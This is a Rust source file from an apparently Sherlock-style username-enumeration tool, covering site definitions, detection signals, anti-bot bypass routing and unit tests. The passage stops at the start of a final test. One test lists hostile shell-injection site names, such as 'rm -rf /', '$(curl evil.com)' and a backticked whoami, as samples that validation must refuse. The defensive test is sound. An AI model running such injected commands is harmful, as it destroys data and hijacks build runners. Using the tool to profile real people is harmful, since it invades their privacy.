adler_core/site.rs
1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
/// One site we can probe for the existence of an account.
///
/// Only `name` and `url` are mandatory in source JSON. Every other field
/// carries `#[serde(default)]` and is skipped on serialisation while it
/// holds its empty / unset value.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
    /// Human-readable site name. Doubles as the stable filter key
    /// (case-insensitive) used by CLI `--only` / `--exclude`.
    pub name: String,
    /// URL template containing a `{username}` placeholder.
    pub url: UrlTemplate,
    /// Ordered list of detection signals. Aggregated per the type-level docs.
    /// Optional in source JSON when [`Site::engine`] is set — the engine's
    /// signals are inherited at load time. After
    /// [`crate::Registry`] resolution this vec is always non-empty (or the
    /// site fails `validate`).
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// One or more usernames known to exist on this site. Consumed by
    /// `adler doctor` to verify the signal list still reports `Found`
    /// for a real account. Accepts either a single string or an array
    /// of strings in JSON; the doctor probes each in declaration order
    /// and passes the present-check if **any** one of them resolves to
    /// `Found`. Listing several is defensive — brand accounts or other
    /// users that the site special-cases (e.g. Instagram's own
    /// `instagram` account) shouldn't false-fail the whole site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_present: Option<KnownPresent>,
    /// Username known to *not* exist on this site (optional). When omitted,
    /// the doctor generates a random nonsense username instead.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_absent: Option<String>,
    /// Optional CSS-selector rules for pulling profile fields (name, bio,
    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub extract: Vec<Extractor>,
    /// Free-form classification tags for scanning a subset of the registry,
    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
    /// A site with no tags is universal (included unless a `--tag` filter
    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
    /// convention, not enforced.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub tags: Vec<String>,
    /// Extra HTTP headers to send with the probe (e.g.
    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
    /// backends apply them via `Network.setExtraHTTPHeaders` before
    /// navigation; the raw-HTTP path doesn't read this yet.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Optional regular expression describing usernames a site will
    /// accept. When set and the scanned username doesn't match, the
    /// site is skipped (the outcome is reported as `Uncertain` with
    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
    /// Saves work AND avoids the false-positive class where a site
    /// 404s on illegal usernames in ways our signal can't tell apart
    /// from a missing account.
    ///
    /// Imported from Sherlock's `regexCheck` field; 95+ sites
    /// upstream carry one (length bounds, character classes, etc.).
    /// [`Site::validate`] compiles the pattern with `regex::Regex`.
    /// A pattern that fails to compile (e.g. one using lookarounds,
    /// which the `regex` crate doesn't support) does **not** reject
    /// the site: validation logs a warning saying the username gate
    /// is disabled for that site and carries on.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
    /// Name of a shared [`Engine`] this site inherits from (e.g.
    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
    /// thousands of instances with identical detection signatures;
    /// defining the signature once on an engine and inheriting it
    /// keeps the registry small and the cost of a platform-wide
    /// HTML change one fix instead of hundreds.
    ///
    /// At [`crate::Registry::validate`] time, engine fields are
    /// merged *under* the site's own — anything the site declares
    /// explicitly (`signals`, `request_headers`, `regex_check`) wins on
    /// conflict; anything left empty / unset is filled from the
    /// engine. An `engine: "X"` referring to a non-existent X is a
    /// load-time error.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub engine: Option<String>,
    /// Characters the site silently drops from the username server-side
    /// before matching — `john.doe` and `johndoe` resolve to the same
    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
    /// at probe time so the URL we issue matches the canonical form
    /// the site uses, avoiding a false `NotFound` on a benign
    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub strip_bad_char: Option<String>,
    /// HTTP method used to probe this site. Defaults to GET — the vast
    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
    /// some Discord/Holopin endpoints) only answer to POST.
    #[serde(default, skip_serializing_if = "is_default_method")]
    pub request_method: HttpMethod,
    /// Request body to send when [`Site::request_method`] is POST. The
    /// literal `{username}` placeholder is substituted with the probe
    /// username (same as URL templates). For GraphQL endpoints this
    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub request_body: Option<String>,
    /// Specific anti-bot mechanisms the site is known to deploy. A
    /// richer alternative to the flat `bot-protected` tag — knowing
    /// *which* protection a site uses lets future routing pick the
    /// right backend (`Cloudflare` → cloudscraper-style bypass,
    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
    /// of the all-or-nothing `bot-protected` decision.
    ///
    /// Independent of [`Site::tags`]: the existing `bot-protected`
    /// tag stays as a back-compat shorthand and routes through the
    /// browser backend exactly as before. When this vector is
    /// non-empty Adler also treats the site as bot-protected
    /// regardless of the tag.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub protection: Vec<ProtectionKind>,
    /// Disable the site without removing it from the registry.
    /// Disabled sites are skipped by [`crate::Registry::filter`] —
    /// they don't get probed, don't appear in `--list-sites`, and
    /// don't count toward the doctor's tally. Useful for parking
    /// known-broken entries with a reason comment instead of
    /// deleting them outright, so a future contributor can re-enable
    /// the entry by flipping the flag once they've authored a
    /// working signature.
    ///
    /// Serialised only when `true`: the `std::ops::Not::not` skip
    /// predicate returns `true` (skip) for a `false` flag.
    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
    pub disabled: bool,
    /// Canonical-source link for mirror-style sites. When a site is
    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
    /// `YouTube`), `source` carries the name of the primary site this
    /// one mirrors. Lets future UX surface "Twitter is offline,
    /// here's the same account on Nitter" without hand-curated
    /// linkage. Empty / `None` for canonical sites and sites with
    /// no known mirror relationship.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub source: Option<String>,
    /// Approximate popularity rank — lower numbers are more popular.
    /// Used by `adler --top N` to scan only the most-popular N sites
    /// (useful for fast checks of high-signal targets). Ranks are
    /// curated, not derived from traffic data: the seed set covers
    /// well-known OSINT-relevant sites where most users have
    /// accounts. Sites without a rank are skipped by `--top N`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub popularity: Option<u32>,
}
170
/// A specific anti-bot mechanism a site is known to deploy. Used to
/// route probes to the right backend (raw HTTP, cloudscraper, full
/// browser) and to inform users what blocks reliable detection.
///
/// Variants are (de)serialised in kebab-case, e.g. `CfJsChallenge`
/// is written as `"cf-js-challenge"`.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "kebab-case")]
#[non_exhaustive]
pub enum ProtectionKind {
    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
    /// (e.g. `FlareSolverr`) without a full browser.
    Cloudflare,
    /// AWS `CloudFront` edge protection. Often UA-strictness only.
    Cloudfront,
    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
    /// challenge model to Cloudflare.
    DdosGuard,
    /// Cloudflare's JS-challenge ("I am under attack" mode).
    /// Needs a JS-executing backend.
    CfJsChallenge,
    /// Cloudflare's WAF firewall blocking by signature, requiring
    /// a real browser fingerprint to clear.
    CfFirewall,
    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
    /// client by its TLS handshake shape, not its UA).
    TlsFingerprint,
    /// `Anubis` proof-of-work challenge. Used by codeberg + a
    /// growing number of FOSS projects to discourage scraping.
    Anubis,
    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
    /// always blocking — `Uncertain` is the honest answer.
    Captcha,
    /// Trivial UA-strictness: rejects unknown User-Agent strings
    /// but lets through a real-browser UA. Cheapest to bypass.
    UserAgent,
    /// Endpoint requires authentication; no anonymous probe path
    /// exists. Practically unscrapable for OSINT.
    UserAuth,
}
209
/// HTTP method used to probe a site. Only GET and POST are supported.
///
/// (De)serialised in upper case: `"GET"` / `"POST"`.
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "UPPERCASE")]
pub enum HttpMethod {
    /// Standard GET — the default for ~99% of sites in the registry.
    #[default]
    Get,
    /// POST — for API endpoints that only differentiate accounts via a
    /// body payload (GraphQL queries, form submissions). Pair with
    /// [`Site::request_body`].
    Post,
}
222
223/// serde's `skip_serializing_if` callback contract requires a
224/// reference, so the by-value lint on a 1-byte type doesn't apply.
225#[allow(clippy::trivially_copy_pass_by_ref)]
226fn is_default_method(m: &HttpMethod) -> bool {
227 matches!(m, HttpMethod::Get)
228}
229
/// Shared detection signature template for a family of sites that
/// run the same forum / blog / wiki software (Discourse, vBulletin,
/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
///
/// Engines carry the same kinds of fields as a [`Site`] does (just
/// the inheritable ones — there's no per-engine `url`, that comes
/// from the site itself). At registry load, the engine's fields
/// are merged *under* each referring site's own fields: site wins
/// on conflict. The merge itself is implemented by
/// [`Engine::merge_into`].
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
    /// Default detection signals for sites of this family.
    /// Inherited only when the site itself declares no `signals`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// Default extra HTTP headers (e.g. a User-Agent that the
    /// platform accepts where the browser default gets blocked).
    /// Merged with the site's own headers; site wins per-key.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Default username-validity regex inherited only when the site
    /// itself doesn't declare one.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
}
256
257impl Engine {
258 /// Compile-check the engine's own constraints — the inheritable
259 /// fields are subject to the same validation as a site's would
260 /// be.
261 ///
262 /// # Errors
263 /// Returns [`Error::InvalidSite`] when the engine name is
264 /// empty, a signal carries an empty marker, or any other
265 /// constraint a [`Site::validate`] would also flag.
266 pub fn validate(&self, name: &str) -> Result<()> {
267 if name.trim().is_empty() {
268 return Err(Error::InvalidSite {
269 reason: "engine name is empty".into(),
270 });
271 }
272 for signal in &self.signals {
273 signal.validate().map_err(|reason| Error::InvalidSite {
274 reason: format!("engine {name:?}: {reason}"),
275 })?;
276 }
277 if let Some(pat) = &self.regex_check {
278 if let Err(err) = regex::Regex::new(pat) {
279 tracing::warn!(
280 engine = %name, pattern = %pat, error = %err,
281 "engine regex_check did not compile; gate disabled for inheriting sites",
282 );
283 }
284 }
285 Ok(())
286 }
287
288 /// Fill the inheritable empty / unset fields of `site` from
289 /// this engine. Site fields are authoritative: if the site has
290 /// any signals at all, no engine signals are merged in.
291 /// `request_headers` merge per-key (site wins on per-key
292 /// conflict).
293 pub fn merge_into(&self, site: &mut Site) {
294 if site.signals.is_empty() {
295 site.signals.clone_from(&self.signals);
296 }
297 for (k, v) in &self.request_headers {
298 site.request_headers
299 .entry(k.clone())
300 .or_insert_with(|| v.clone());
301 }
302 if site.regex_check.is_none() {
303 site.regex_check.clone_from(&self.regex_check);
304 }
305 }
306}
307
/// Known-present declaration on a [`Site`].
///
/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
/// the site was authored with, so single-username entries stay
/// compact.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
    /// Exactly one candidate username.
    Single(String),
    /// A list of candidate usernames. Doctor passes if any resolve
    /// to `Found`. Intended for two or more entries, but the type
    /// itself does not enforce a count: an empty list is possible
    /// here and is rejected by [`Site::validate`].
    Multiple(Vec<String>),
}
325
326impl KnownPresent {
327 /// View all candidate usernames as a slice, in declaration order.
328 /// Always non-empty for `Single`; may be empty for a hand-authored
329 /// `Multiple([])` (validation rejects that).
330 pub fn as_slice(&self) -> &[String] {
331 match self {
332 Self::Single(s) => std::slice::from_ref(s),
333 Self::Multiple(v) => v.as_slice(),
334 }
335 }
336
337 /// Primary candidate — the first declared username. `Single`
338 /// always has one; `Multiple` may be empty if a contributor wrote
339 /// `[]` (caught by [`Site::validate`]).
340 pub fn primary(&self) -> Option<&str> {
341 self.as_slice().first().map(String::as_str)
342 }
343}
344
345impl From<&str> for KnownPresent {
346 fn from(s: &str) -> Self {
347 Self::Single(s.to_owned())
348 }
349}
350
351impl From<String> for KnownPresent {
352 fn from(s: String) -> Self {
353 Self::Single(s)
354 }
355}
356
/// Upper bound on a site name's length, enforced by
/// [`Site::validate`]. Names appear in CLI output, CSV columns, and
/// the validate-sites.yml workflow's run-summary table — keeping them
/// short avoids both UI breakage and pathological CI artefacts.
const NAME_MAX_LEN: usize = 80;
362
/// Decide whether `name` is safe to interpolate into shell, CSV, and
/// CLI argument contexts.
///
/// Mirrors the JSON Schema pattern `^[\w][\w .()!/+-]*$`: the first
/// character must be an ASCII letter, digit, or `_`; every later
/// character may additionally be a space or one of `.()!/+-`. The
/// empty string is therefore rejected.
fn is_safe_site_name(name: &str) -> bool {
    // `\w` in the schema pattern: ASCII alphanumerics plus underscore.
    let is_word = |c: char| c == '_' || c.is_ascii_alphanumeric();
    // Punctuation tolerated anywhere after the first character.
    let is_extra = |c: char| " .()!/+-".contains(c);

    let mut rest = name.chars();
    let head_ok = matches!(rest.next(), Some(first) if is_word(first));
    head_ok && rest.all(|c| is_word(c) || is_extra(c))
}
379
/// A rule for extracting one profile field from a page.
///
/// [`Site::validate`] rejects an extractor whose `field` is blank or
/// whose `selector` does not parse as a CSS selector.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
    pub field: String,
    /// CSS selector locating the element.
    pub selector: String,
    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
    /// element's trimmed text content is used.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub attr: Option<String>,
}
392
393impl Site {
394 /// Render the site URL for a given username.
395 ///
396 /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
397 /// those characters are removed from `username` before
398 /// substitution — so a `john.doe` probe against a site that
399 /// lists `strip_bad_char: "."` actually hits the URL for
400 /// `johndoe`, matching the canonical form the site stores
401 /// internally.
402 pub fn url_for(&self, username: &Username) -> String {
403 let raw = username.as_str();
404 match self.strip_bad_char.as_deref() {
405 Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
406 let stripped: String = raw.chars().filter(|c| !chars.contains(*c)).collect();
407 self.url.substitute(&stripped)
408 }
409 _ => self.url.substitute(raw),
410 }
411 }
412
413 /// Validate semantic invariants the type system can't enforce
414 /// (empty signals list, empty markers, empty status code sets).
415 pub fn validate(&self) -> Result<()> {
416 if self.name.trim().is_empty() {
417 return Err(Error::InvalidSite {
418 reason: "site name is empty".into(),
419 });
420 }
421 // Site names doubled as shell-interpolation values in the
422 // `validate-sites.yml` PR gate; an unsanitised name like
423 // `Foo"; rm -rf /; #` would have broken out of `"$name"`
424 // quoting and run arbitrary commands on the runner. Both the
425 // JSON Schema and this Rust loader enforce a safe character
426 // class (word chars plus a few visual punctuation marks) at
427 // every entry point.
428 if self.name.len() > NAME_MAX_LEN {
429 return Err(Error::InvalidSite {
430 reason: format!(
431 "site name longer than {NAME_MAX_LEN} chars: {:?}",
432 self.name
433 ),
434 });
435 }
436 if !is_safe_site_name(&self.name) {
437 return Err(Error::InvalidSite {
438 reason: format!(
439 "site name {:?} contains characters outside the allowed \
440 set (word chars, space, `.()!/+-`)",
441 self.name
442 ),
443 });
444 }
445 if self.signals.is_empty() {
446 return Err(Error::InvalidSite {
447 reason: format!("site {:?}: signals list is empty", self.name),
448 });
449 }
450 for signal in &self.signals {
451 signal.validate().map_err(|reason| Error::InvalidSite {
452 reason: format!("site {:?}: {reason}", self.name),
453 })?;
454 }
455 for extractor in &self.extract {
456 if extractor.field.trim().is_empty() {
457 return Err(Error::InvalidSite {
458 reason: format!("site {:?}: extractor has an empty field name", self.name),
459 });
460 }
461 if scraper::Selector::parse(&extractor.selector).is_err() {
462 return Err(Error::InvalidSite {
463 reason: format!(
464 "site {:?}: invalid CSS selector {:?} for field {:?}",
465 self.name, extractor.selector, extractor.field
466 ),
467 });
468 }
469 }
470 if let Some(pat) = &self.regex_check {
471 if let Err(err) = regex::Regex::new(pat) {
472 // Sherlock's regexes occasionally use lookarounds
473 // (e.g. `(?![.-])`), which the Rust `regex` crate
474 // doesn't support — it's a true regular-language
475 // engine for performance + DoS safety. Rather than
476 // reject the whole site over a username-gate the
477 // probe path will simply skip, downgrade to a warn
478 // and let the site keep working at the cost of one
479 // wasted probe per illegal username.
480 tracing::warn!(
481 site = %self.name, pattern = %pat, error = %err,
482 "regex_check did not compile; username-gate disabled for this site",
483 );
484 }
485 }
486 if let Some(kp) = &self.known_present {
487 if kp.as_slice().is_empty() {
488 return Err(Error::InvalidSite {
489 reason: format!("site {:?}: known_present is an empty list", self.name),
490 });
491 }
492 for name in kp.as_slice() {
493 if name.trim().is_empty() {
494 return Err(Error::InvalidSite {
495 reason: format!(
496 "site {:?}: known_present contains an empty username",
497 self.name
498 ),
499 });
500 }
501 }
502 }
503 for tag in &self.tags {
504 if tag.trim().is_empty() {
505 return Err(Error::InvalidSite {
506 reason: format!("site {:?}: tag is empty", self.name),
507 });
508 }
509 }
510 Ok(())
511 }
512}
513
/// URL template containing a `{username}` placeholder.
///
/// Validated at construction: must contain the placeholder and start with
/// `http://` or `https://`. Deserialisation goes through the same
/// validation, so an invalid template is refused when it is parsed.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
520
/// Literal token a [`UrlTemplate`] must contain; every occurrence is
/// replaced by the username when the template is rendered.
const PLACEHOLDER: &str = "{username}";
522
523impl UrlTemplate {
524 /// Build a template, validating placeholder and scheme.
525 pub fn new(template: impl Into<String>) -> Result<Self> {
526 let t = template.into();
527 if !t.contains(PLACEHOLDER) {
528 return Err(Error::InvalidSite {
529 reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
530 });
531 }
532 if !(t.starts_with("http://") || t.starts_with("https://")) {
533 return Err(Error::InvalidSite {
534 reason: format!("url template must start with http(s)://: {t:?}"),
535 });
536 }
537 Ok(Self(t))
538 }
539
540 fn substitute(&self, username: &str) -> String {
541 self.0.replace(PLACEHOLDER, username)
542 }
543
544 /// Borrow the raw template (with placeholder).
545 pub fn as_str(&self) -> &str {
546 &self.0
547 }
548}
549
550impl fmt::Display for UrlTemplate {
551 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
552 f.write_str(&self.0)
553 }
554}
555
556impl Serialize for UrlTemplate {
557 fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
558 self.0.serialize(s)
559 }
560}
561
562impl<'de> Deserialize<'de> for UrlTemplate {
563 fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
564 let raw = String::deserialize(d)?;
565 Self::new(raw).map_err(serde::de::Error::custom)
566 }
567}
568
/// A single piece of evidence about whether an account exists.
///
/// Signals are tagged in JSON by their `kind`. New variants will land for
/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
/// adding variants is not a breaking change.
///
/// The `kind` value is the variant name in snake case, e.g.
/// `{"kind": "status_found", "codes": [200]}`.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
    /// Votes **`Found`** when the response status is in `codes`.
    StatusFound {
        /// Status codes that vote for existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`NotFound`** when the response status is in `codes`.
    StatusNotFound {
        /// Status codes that vote for non-existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`Found`** when the response body contains `text`.
    BodyPresent {
        /// Substring whose appearance votes for existence. Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the response body contains `text`.
    /// (The name refers to the account being absent, not the text.)
    BodyAbsent {
        /// Substring whose appearance votes for non-existence (e.g.
        /// `"Profile not found"`). Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the final URL (post-redirect) contains
    /// `fragment`.
    RedirectAbsent {
        /// Substring that, when present in the final URL, indicates the
        /// account is missing (typically `"/login"` or `"/404"`). Must be
        /// non-empty.
        fragment: String,
    },
}
608
/// Probe data extracted from an HTTP response, fed to each [`Signal`].
///
/// Internal detection plumbing — not part of the public API. The
/// string fields are borrowed from the caller for the lifetime `'a`.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// HTTP status code.
    pub(crate) status: u16,
    /// Final URL after redirects.
    pub(crate) final_url: &'a str,
    /// Decoded response body. Empty string when no body-using signal is configured.
    pub(crate) body: &'a str,
}
621
/// What one signal concluded after looking at a probe.
///
/// Individual verdicts are combined into a final [`MatchKind`] by
/// [`aggregate`].
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
    /// This signal votes that the account exists.
    Found,
    /// This signal votes that the account does not exist.
    NotFound,
    /// This signal had nothing to say (its trigger condition didn't match).
    Ambiguous,
}
632
633impl Signal {
634 /// True if this signal needs to inspect the response body. Used by the
635 /// client to skip body reads when no signal requires them.
636 pub(crate) fn needs_body(&self) -> bool {
637 matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
638 }
639
640 /// Evaluate this signal against a probe and produce a vote.
641 pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
642 match self {
643 Self::StatusFound { codes } => {
644 if codes.contains(&probe.status) {
645 SignalVerdict::Found
646 } else {
647 SignalVerdict::Ambiguous
648 }
649 }
650 Self::StatusNotFound { codes } => {
651 if codes.contains(&probe.status) {
652 SignalVerdict::NotFound
653 } else {
654 SignalVerdict::Ambiguous
655 }
656 }
657 Self::BodyPresent { text } => {
658 if probe.body.contains(text.as_str()) {
659 SignalVerdict::Found
660 } else {
661 SignalVerdict::Ambiguous
662 }
663 }
664 Self::BodyAbsent { text } => {
665 if probe.body.contains(text.as_str()) {
666 SignalVerdict::NotFound
667 } else {
668 SignalVerdict::Ambiguous
669 }
670 }
671 Self::RedirectAbsent { fragment } => {
672 if probe.final_url.contains(fragment.as_str()) {
673 SignalVerdict::NotFound
674 } else {
675 SignalVerdict::Ambiguous
676 }
677 }
678 }
679 }
680
681 /// Human-readable description of why this signal fired against `probe`,
682 /// for verdict explainability. Only meaningful for a signal that voted
683 /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
684 pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
685 match self {
686 Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
687 Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
688 Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
689 Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
690 Self::RedirectAbsent { fragment } => {
691 format!("final URL contains {fragment:?} (redirect_absent)")
692 }
693 }
694 }
695
696 fn validate(&self) -> std::result::Result<(), String> {
697 match self {
698 Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
699 if codes.is_empty() {
700 return Err("status signal codes list is empty".into());
701 }
702 }
703 Self::BodyPresent { text } | Self::BodyAbsent { text } => {
704 if text.is_empty() {
705 return Err("body signal text is empty".into());
706 }
707 }
708 Self::RedirectAbsent { fragment } => {
709 if fragment.is_empty() {
710 return Err("redirect signal fragment is empty".into());
711 }
712 }
713 }
714 Ok(())
715 }
716}
717
718/// Aggregate per-signal verdicts into a final [`MatchKind`].
719///
720/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
721/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
722/// docs for why a `NotFound` vote outranks a `Found` vote.
723pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
724where
725 I: IntoIterator<Item = SignalVerdict>,
726{
727 let mut found = false;
728 let mut not_found = false;
729 for v in verdicts {
730 match v {
731 SignalVerdict::Found => found = true,
732 SignalVerdict::NotFound => not_found = true,
733 SignalVerdict::Ambiguous => {}
734 }
735 }
736 if not_found {
737 MatchKind::NotFound
738 } else if found {
739 MatchKind::Found
740 } else {
741 MatchKind::Uncertain
742 }
743}
744
745#[cfg(test)]
746mod tests {
747 use super::*;
748
749 fn site_with(signals: Vec<Signal>) -> Site {
750 Site {
751 name: "Example".into(),
752 url: UrlTemplate::new("https://example.com/{username}").unwrap(),
753 signals,
754 known_present: None,
755 known_absent: None,
756 extract: Vec::new(),
757 tags: Vec::new(),
758 request_headers: std::collections::BTreeMap::new(),
759 regex_check: None,
760 engine: None,
761 strip_bad_char: None,
762 request_method: crate::site::HttpMethod::Get,
763 request_body: None,
764 protection: Vec::new(),
765 disabled: false,
766 source: None,
767 popularity: None,
768 }
769 }
770
/// The placeholder in the fixture URL is replaced by the username.
#[test]
fn url_template_substitutes_placeholder() {
    let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
    let alice = Username::new("alice").unwrap();
    let rendered = site.url_for(&alice);
    assert_eq!(rendered, "https://example.com/alice");
}
777
/// Characters listed in `strip_bad_char` are removed from the
/// username before it lands in the URL.
#[test]
fn url_for_strips_bad_chars_before_substitution() {
    let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
    site.strip_bad_char = Some(String::from("."));
    let dotted = Username::new("john.doe").unwrap();
    let rendered = site.url_for(&dotted);
    assert_eq!(rendered, "https://example.com/johndoe");
}
785
/// A username containing none of the `strip_bad_char` characters is
/// substituted unchanged.
#[test]
fn url_for_strip_bad_char_noop_when_no_match() {
    let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
    site.strip_bad_char = Some(String::from("."));
    let plain = Username::new("alice").unwrap();
    let rendered = site.url_for(&plain);
    assert_eq!(rendered, "https://example.com/alice");
}
793
/// A template without `{username}` is refused at construction.
#[test]
fn url_template_rejects_missing_placeholder() {
    let outcome = UrlTemplate::new("https://example.com/users/");
    assert!(outcome.is_err());
}
798
/// Only `http://` and `https://` templates are accepted.
#[test]
fn url_template_rejects_bad_scheme() {
    let outcome = UrlTemplate::new("ftp://example.com/{username}");
    assert!(outcome.is_err());
}
803
/// A site with no signals at all fails validation.
#[test]
fn validate_requires_non_empty_signals() {
    let site = site_with(Vec::new());
    let message = site.validate().unwrap_err().to_string();
    assert!(message.contains("signals list is empty"));
}
809
/// A status signal with an empty code list fails validation.
#[test]
fn validate_rejects_empty_status_codes() {
    let site = site_with(vec![Signal::StatusFound { codes: Vec::new() }]);
    let message = site.validate().unwrap_err().to_string();
    assert!(message.contains("status signal"));
}
817
/// A body signal with empty text fails validation.
#[test]
fn validate_rejects_empty_body_text() {
    let blank = Signal::BodyAbsent {
        text: String::new(),
    };
    let message = site_with(vec![blank]).validate().unwrap_err().to_string();
    assert!(message.contains("body signal"));
}
827
/// A redirect signal with an empty fragment fails validation.
#[test]
fn validate_rejects_empty_redirect_fragment() {
    let blank = Signal::RedirectAbsent {
        fragment: String::new(),
    };
    let message = site_with(vec![blank]).validate().unwrap_err().to_string();
    assert!(message.contains("redirect signal"));
}
837
#[test]
fn validate_rejects_shell_metacharacters_in_name() {
    // Background: the validate-sites.yml workflow once passed
    // `--only "$name"` with `$name` taken from PR-controlled sites.json,
    // so a name such as `Foo"; rm -rf /; #` could escape the `"..."`
    // quoting and execute on the runner. Both the schema and this loader
    // enforce a safe character class; every sample below must be refused.
    //
    // NOTE(review): "Qux\\nfoo" is a literal backslash followed by `n`,
    // not a newline — confirm whether a real newline case was intended.
    let hostile_names = [
        "Foo\"; rm -rf /; #",
        "Bar$(curl evil.com)",
        "Baz`whoami`",
        "Qux\\nfoo",
        "back\\slash",
        "pipe|ish",
        "semi;colon",
        "amp&and",
        "lt<gt>",
    ];
    for bad in hostile_names {
        let mut candidate = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        candidate.name = bad.into();
        let err = candidate.validate().unwrap_err();
        let rendered = err.to_string();
        assert!(
            rendered.contains("characters outside the allowed set"),
            "expected unsafe-name rejection for {bad:?}, got {err}",
        );
    }
}
867
#[test]
fn validate_accepts_real_world_site_names() {
